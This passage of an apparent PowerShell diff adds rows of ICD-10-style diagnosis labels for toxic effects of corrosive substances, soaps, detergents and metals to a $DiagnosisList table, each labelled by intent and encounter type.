+ $null = $DiagnosisList.Rows.Add("Toxic effect of other corrosive organic compounds, intentional self-harm","Toxic effect of other corrosive organic compounds, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other corrosive organic compounds, intentional self-harm","Toxic effect of other corrosive organic compounds, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other corrosive organic compounds, assault","Toxic effect of other corrosive organic compounds, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other corrosive organic compounds, assault","Toxic effect of other corrosive organic compounds, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other corrosive organic compounds, assault","Toxic effect of other corrosive organic compounds, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other corrosive organic compounds, undetermined","Toxic effect of other corrosive organic compounds, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other corrosive organic compounds, undetermined","Toxic effect of other corrosive organic compounds, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other corrosive organic compounds, undetermined","Toxic effect of other corrosive organic compounds, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of corrosive acids and acid-like substances, accidental (unintentional)","Toxic effect of corrosive acids and acid-like substances, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of corrosive acids and acid-like substances, accidental (unintentional)","Toxic effect of corrosive acids and acid-like substances, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of corrosive acids and acid-like substances, accidental (unintentional)","Toxic effect of corrosive acids and acid-like substances, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of corrosive acids and acid-like substances, intentional self-harm","Toxic effect of corrosive acids and acid-like substances, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of corrosive acids and acid-like substances, intentional self-harm","Toxic effect of corrosive acids and acid-like substances, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of corrosive acids and acid-like substances, intentional self-harm","Toxic effect of corrosive acids and acid-like substances, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of corrosive acids and acid-like substances, assault","Toxic effect of corrosive acids and acid-like substances, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of corrosive acids and acid-like substances, assault","Toxic effect of corrosive acids and acid-like substances, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of corrosive acids and acid-like substances, assault","Toxic effect of corrosive acids and acid-like substances, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of corrosive acids and acid-like substances, undetermined","Toxic effect of corrosive acids and acid-like substances, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of corrosive acids and acid-like substances, undetermined","Toxic effect of corrosive acids and acid-like substances, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of corrosive acids and acid-like substances, undetermined","Toxic effect of corrosive acids and acid-like substances, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of corrosive alkalis and alkali-like substances, accidental (unintentional)","Toxic effect of corrosive alkalis and alkali-like substances, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of corrosive alkalis and alkali-like substances, accidental (unintentional)","Toxic effect of corrosive alkalis and alkali-like substances, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of corrosive alkalis and alkali-like substances, accidental (unintentional)","Toxic effect of corrosive alkalis and alkali-like substances, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of corrosive alkalis and alkali-like substances, intentional self-harm","Toxic effect of corrosive alkalis and alkali-like substances, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of corrosive alkalis and alkali-like substances, intentional self-harm","Toxic effect of corrosive alkalis and alkali-like substances, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of corrosive alkalis and alkali-like substances, intentional self-harm","Toxic effect of corrosive alkalis and alkali-like substances, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of corrosive alkalis and alkali-like substances, assault","Toxic effect of corrosive alkalis and alkali-like substances, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of corrosive alkalis and alkali-like substances, assault","Toxic effect of corrosive alkalis and alkali-like substances, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of corrosive alkalis and alkali-like substances, assault","Toxic effect of corrosive alkalis and alkali-like substances, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of corrosive alkalis and alkali-like substances, undetermined","Toxic effect of corrosive alkalis and alkali-like substances, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of corrosive alkalis and alkali-like substances, undetermined","Toxic effect of corrosive alkalis and alkali-like substances, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of corrosive alkalis and alkali-like substances, undetermined","Toxic effect of corrosive alkalis and alkali-like substances, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified corrosive substance, accidental (unintentional)","Toxic effect of unspecified corrosive substance, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified corrosive substance, accidental (unintentional)","Toxic effect of unspecified corrosive substance, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified corrosive substance, accidental (unintentional)","Toxic effect of unspecified corrosive substance, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified corrosive substance, intentional self-harm","Toxic effect of unspecified corrosive substance, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified corrosive substance, intentional self-harm","Toxic effect of unspecified corrosive substance, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified corrosive substance, intentional self-harm","Toxic effect of unspecified corrosive substance, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified corrosive substance, assault","Toxic effect of unspecified corrosive substance, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified corrosive substance, assault","Toxic effect of unspecified corrosive substance, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified corrosive substance, assault","Toxic effect of unspecified corrosive substance, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified corrosive substance, undetermined","Toxic effect of unspecified corrosive substance, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified corrosive substance, undetermined","Toxic effect of unspecified corrosive substance, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified corrosive substance, undetermined","Toxic effect of unspecified corrosive substance, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of soaps, accidental (unintentional)","Toxic effect of soaps, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of soaps, accidental (unintentional)","Toxic effect of soaps, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of soaps, accidental (unintentional)","Toxic effect of soaps, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of soaps, intentional self-harm","Toxic effect of soaps, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of soaps, intentional self-harm","Toxic effect of soaps, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of soaps, intentional self-harm","Toxic effect of soaps, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of soaps, assault","Toxic effect of soaps, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of soaps, assault","Toxic effect of soaps, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of soaps, assault","Toxic effect of soaps, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of soaps, undetermined","Toxic effect of soaps, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of soaps, undetermined","Toxic effect of soaps, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of soaps, undetermined","Toxic effect of soaps, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of detergents, accidental (unintentional)","Toxic effect of detergents, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of detergents, accidental (unintentional)","Toxic effect of detergents, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of detergents, accidental (unintentional)","Toxic effect of detergents, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of detergents, intentional self-harm","Toxic effect of detergents, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of detergents, intentional self-harm","Toxic effect of detergents, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of detergents, intentional self-harm","Toxic effect of detergents, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of detergents, assault","Toxic effect of detergents, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of detergents, assault","Toxic effect of detergents, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of detergents, assault","Toxic effect of detergents, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of detergents, undetermined","Toxic effect of detergents, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of detergents, undetermined","Toxic effect of detergents, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of detergents, undetermined","Toxic effect of detergents, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of lead and its compounds, accidental (unintentional)","Toxic effect of lead and its compounds, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of lead and its compounds, accidental (unintentional)","Toxic effect of lead and its compounds, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of lead and its compounds, accidental (unintentional)","Toxic effect of lead and its compounds, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of lead and its compounds, intentional self-harm","Toxic effect of lead and its compounds, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of lead and its compounds, intentional self-harm","Toxic effect of lead and its compounds, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of lead and its compounds, intentional self-harm","Toxic effect of lead and its compounds, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of lead and its compounds, assault","Toxic effect of lead and its compounds, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of lead and its compounds, assault","Toxic effect of lead and its compounds, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of lead and its compounds, assault","Toxic effect of lead and its compounds, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of lead and its compounds, undetermined","Toxic effect of lead and its compounds, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of lead and its compounds, undetermined","Toxic effect of lead and its compounds, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of lead and its compounds, undetermined","Toxic effect of lead and its compounds, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of mercury and its compounds, accidental (unintentional)","Toxic effect of mercury and its compounds, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of mercury and its compounds, accidental (unintentional)","Toxic effect of mercury and its compounds, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of mercury and its compounds, accidental (unintentional)","Toxic effect of mercury and its compounds, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of mercury and its compounds, intentional self-harm","Toxic effect of mercury and its compounds, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of mercury and its compounds, intentional self-harm","Toxic effect of mercury and its compounds, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of mercury and its compounds, intentional self-harm","Toxic effect of mercury and its compounds, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of mercury and its compounds, assault","Toxic effect of mercury and its compounds, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of mercury and its compounds, assault","Toxic effect of mercury and its compounds, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of mercury and its compounds, assault","Toxic effect of mercury and its compounds, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of mercury and its compounds, undetermined","Toxic effect of mercury and its compounds, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of mercury and its compounds, undetermined","Toxic effect of mercury and its compounds, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of mercury and its compounds, undetermined","Toxic effect of mercury and its compounds, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of chromium and its compounds, accidental (unintentional)","Toxic effect of chromium and its compounds, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chromium and its compounds, accidental (unintentional)","Toxic effect of chromium and its compounds, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chromium and its compounds, accidental (unintentional)","Toxic effect of chromium and its compounds, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of chromium and its compounds, intentional self-harm","Toxic effect of chromium and its compounds, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chromium and its compounds, intentional self-harm","Toxic effect of chromium and its compounds, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chromium and its compounds, intentional self-harm","Toxic effect of chromium and its compounds, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of chromium and its compounds, assault","Toxic effect of chromium and its compounds, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chromium and its compounds, assault","Toxic effect of chromium and its compounds, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chromium and its compounds, assault","Toxic effect of chromium and its compounds, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of chromium and its compounds, undetermined","Toxic effect of chromium and its compounds, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chromium and its compounds, undetermined","Toxic effect of chromium and its compounds, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chromium and its compounds, undetermined","Toxic effect of chromium and its compounds, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of cadmium and its compounds, accidental (unintentional)","Toxic effect of cadmium and its compounds, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of cadmium and its compounds, accidental (unintentional)","Toxic effect of cadmium and its compounds, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of cadmium and its compounds, accidental (unintentional)","Toxic effect of cadmium and its compounds, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of cadmium and its compounds, intentional self-harm","Toxic effect of cadmium and its compounds, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of cadmium and its compounds, intentional self-harm","Toxic effect of cadmium and its compounds, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of cadmium and its compounds, intentional self-harm","Toxic effect of cadmium and its compounds, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of cadmium and its compounds, assault","Toxic effect of cadmium and its compounds, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of cadmium and its compounds, assault","Toxic effect of cadmium and its compounds, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of cadmium and its compounds, assault","Toxic effect of cadmium and its compounds, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of cadmium and its compounds, undetermined","Toxic effect of cadmium and its compounds, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of cadmium and its compounds, undetermined","Toxic effect of cadmium and its compounds, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of cadmium and its compounds, undetermined","Toxic effect of cadmium and its compounds, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of copper and its compounds, accidental (unintentional)","Toxic effect of copper and its compounds, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of copper and its compounds, accidental (unintentional)","Toxic effect of copper and its compounds, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of copper and its compounds, accidental (unintentional)","Toxic effect of copper and its compounds, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of copper and its compounds, intentional self-harm","Toxic effect of copper and its compounds, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of copper and its compounds, intentional self-harm","Toxic effect of copper and its compounds, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of copper and its compounds, intentional self-harm","Toxic effect of copper and its compounds, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of copper and its compounds, assault","Toxic effect of copper and its compounds, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of copper and its compounds, assault","Toxic effect of copper and its compounds, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of copper and its compounds, assault","Toxic effect of copper and its compounds, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of copper and its compounds, undetermined","Toxic effect of copper and its compounds, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of copper and its compounds, undetermined","Toxic effect of copper and its compounds, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of copper and its compounds, undetermined","Toxic effect of copper and its compounds, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of zinc and its compounds, accidental (unintentional)","Toxic effect of zinc and its compounds, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of zinc and its compounds, accidental (unintentional)","Toxic effect of zinc and its compounds, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of zinc and its compounds, accidental (unintentional)","Toxic effect of zinc and its compounds, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of zinc and its compounds, intentional self-harm","Toxic effect of zinc and its compounds, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of zinc and its compounds, intentional self-harm","Toxic effect of zinc and its compounds, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of zinc and its compounds, intentional self-harm","Toxic effect of zinc and its compounds, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of zinc and its compounds, assault","Toxic effect of zinc and its compounds, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of zinc and its compounds, assault","Toxic effect of zinc and its compounds, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of zinc and its compounds, assault","Toxic effect of zinc and its compounds, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of zinc and its compounds, undetermined","Toxic effect of zinc and its compounds, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of zinc and its compounds, undetermined","Toxic effect of zinc and its compounds, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of zinc and its compounds, undetermined","Toxic effect of zinc and its compounds, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of tin and its compounds, accidental (unintentional)","Toxic effect of tin and its compounds, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of tin and its compounds, accidental (unintentional)","Toxic effect of tin and its compounds, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of tin and its compounds, accidental (unintentional)","Toxic effect of tin and its compounds, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of tin and its compounds, intentional self-harm","Toxic effect of tin and its compounds, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of tin and its compounds, intentional self-harm","Toxic effect of tin and its compounds, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of tin and its compounds, intentional self-harm","Toxic effect of tin and its compounds, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of tin and its compounds, assault","Toxic effect of tin and its compounds, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of tin and its compounds, assault","Toxic effect of tin and its compounds, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of tin and its compounds, assault","Toxic effect of tin and its compounds, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of tin and its compounds, undetermined","Toxic effect of tin and its compounds, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of tin and its compounds, undetermined","Toxic effect of tin and its compounds, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of tin and its compounds, undetermined","Toxic effect of tin and its compounds, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of beryllium and its compounds, accidental (unintentional)","Toxic effect of beryllium and its compounds, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of beryllium and its compounds, accidental (unintentional)","Toxic effect of beryllium and its compounds, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of beryllium and its compounds, accidental (unintentional)","Toxic effect of beryllium and its compounds, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of beryllium and its compounds, intentional self-harm","Toxic effect of beryllium and its compounds, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of beryllium and its compounds, intentional self-harm","Toxic effect of beryllium and its compounds, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of beryllium and its compounds, intentional self-harm","Toxic effect of beryllium and its compounds, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of beryllium and its compounds, assault","Toxic effect of beryllium and its compounds, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of beryllium and its compounds, assault","Toxic effect of beryllium and its compounds, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of beryllium and its compounds, assault","Toxic effect of beryllium and its compounds, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of beryllium and its compounds, undetermined","Toxic effect of beryllium and its compounds, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of beryllium and its compounds, undetermined","Toxic effect of beryllium and its compounds, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of beryllium and its compounds, undetermined","Toxic effect of beryllium and its compounds, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of thallium, accidental (unintentional)","Toxic effect of thallium, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of thallium, accidental (unintentional)","Toxic effect of thallium, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of thallium, accidental (unintentional)","Toxic effect of thallium, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of thallium, intentional self-harm","Toxic effect of thallium, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of thallium, intentional self-harm","Toxic effect of thallium, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of thallium, intentional self-harm","Toxic effect of thallium, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of thallium, assault","Toxic effect of thallium, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of thallium, assault","Toxic effect of thallium, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of thallium, assault","Toxic effect of thallium, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of thallium, undetermined","Toxic effect of thallium, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of thallium, undetermined","Toxic effect of thallium, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of thallium, undetermined","Toxic effect of thallium, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other metals, accidental (unintentional)","Toxic effect of other metals, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other metals, accidental (unintentional)","Toxic effect of other metals, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other metals, accidental (unintentional)","Toxic effect of other metals, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other metals, intentional self-harm","Toxic effect of other metals, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other metals, intentional self-harm","Toxic effect of other metals, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other metals, intentional self-harm","Toxic effect of other metals, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other metals, assault","Toxic effect of other metals, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other metals, assault","Toxic effect of other metals, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other metals, assault","Toxic effect of other metals, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other metals, undetermined","Toxic effect of other metals, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other metals, undetermined","Toxic effect of other metals, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other metals, undetermined","Toxic effect of other metals, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified metal, accidental (unintentional)","Toxic effect of unspecified metal, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified metal, accidental (unintentional)","Toxic effect of unspecified metal, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified metal, accidental (unintentional)","Toxic effect of unspecified metal, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified metal, intentional self-harm","Toxic effect of unspecified metal, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified metal, intentional self-harm","Toxic effect of unspecified metal, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified metal, intentional self-harm","Toxic effect of unspecified metal, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified metal, assault","Toxic effect of unspecified metal, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified metal, assault","Toxic effect of unspecified metal, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified metal, assault","Toxic effect of unspecified metal, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified metal, undetermined","Toxic effect of unspecified metal, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified metal, undetermined","Toxic effect of unspecified metal, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified metal, undetermined","Toxic effect of unspecified metal, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of arsenic and its compounds, accidental (unintentional)","Toxic effect of arsenic and its compounds, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of arsenic and its compounds, accidental (unintentional)","Toxic effect of arsenic and its compounds, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of arsenic and its compounds, accidental (unintentional)","Toxic effect of arsenic and its compounds, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of arsenic and its compounds, intentional self-harm","Toxic effect of arsenic and its compounds, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of arsenic and its compounds, intentional self-harm","Toxic effect of arsenic and its compounds, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of arsenic and its compounds, intentional self-harm","Toxic effect of arsenic and its compounds, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of arsenic and its compounds, assault","Toxic effect of arsenic and its compounds, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of arsenic and its compounds, assault","Toxic effect of arsenic and its compounds, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of arsenic and its compounds, assault","Toxic effect of arsenic and its compounds, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of arsenic and its compounds, undetermined","Toxic effect of arsenic and its compounds, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of arsenic and its compounds, undetermined","Toxic effect of arsenic and its compounds, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of arsenic and its compounds, undetermined","Toxic effect of arsenic and its compounds, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of phosphorus and its compounds, accidental (unintentional)","Toxic effect of phosphorus and its compounds, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of phosphorus and its compounds, accidental (unintentional)","Toxic effect of phosphorus and its compounds, accidental (unintentional), 